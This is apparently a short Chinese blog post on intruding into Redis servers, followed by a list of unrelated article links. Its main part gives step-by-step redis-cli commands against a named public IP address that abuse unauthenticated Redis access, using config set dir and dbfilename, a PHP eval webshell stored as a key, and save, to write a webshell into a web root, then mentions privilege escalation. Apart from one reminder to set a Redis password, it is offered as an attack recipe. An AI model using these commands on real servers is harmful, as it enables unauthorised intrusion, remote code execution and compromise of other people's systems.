redis入侵小结
2024-10-14 17:39:13
redis安装:
windows安装包:http://pan.baidu.com/s/1i3jLlC5
下载下来之后,开始安装:
redis-server.exe redis.conf:
简单一步,安装成功,保持这个windows持续运行~
查看一下我们本机的端口,可以看到多了一个6379端口,安全风险来了,记得设置redis的密码~
接下来,开始利用redis-cli.exe来进行远程redis的入侵:
如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell:
开启redis客户端
输入以下命令来连接远程redis
redis-cli -h 125.39.185.150 -p 6379
接下来,在远程redis内存中设置数据:
config set dir /var/www/html(在内存中设置切换的web目录/var/www/html)
config set dbfilename test.php(在内存中的/var/www/html目录下建立一个test.php文件)
set xiaoma "<?php @eval($_POST[mi]);?>"(设置key-value,此时该值在Memory中)
save (将Memory中的key-value保存到硬盘,并保存为test.php文件)
四个OK就搞定了~
此时,就可以直接连shell,开始提权了~
redis入侵参考:
http://www.wooyun.org/bugs/wooyun-2015-0101465
http://www.wooyun.org/bugs/wooyun-2010-0105096
最新文章
- React生命周期
- Centos7 基本shell命令
- C#中static关键字的作用
- [LintCode] Length of Last Word 求末尾单词的长度
- 自定义一个可以使用foreach语句进行迭代的类(IEnumerable)
- oracle 求两个时间点直接的分钟、小时数
- 【转】开发者教程:如何将Android应用发布到Google Play(Android Market)官方市场
- nginx &;amp; flup &;amp; django &;amp; python3.x @ window7配置备忘录
- 读书笔记系列01-《收获、不止Oracle》
- .NET Core 2.1 Preview 2发布 - April 10, 2018
- OpenCV-Python:Harris角点检测与Shi-Tomasi角点检测
- iOS中Realm数据库的基本用法
- db2 查询表空间使用情况
- 在windows 10下使用docker
- photoshop cs6安装过程中安装程序遇到错误:请重启计算机,解决办法
- cogs 330. [NOI2003] 文本编辑器
- Ubuntu16.04下Mongodb(离线安装方式|非apt-get)安装部署步骤(图文详解)(博主推荐)
- HDU1102&;&;POJ2421 Constructing Roads 2017-04-12 19:09 44人阅读 评论(0) 收藏
- java反射之构造方法(三)
- docker 数据卷挂载总结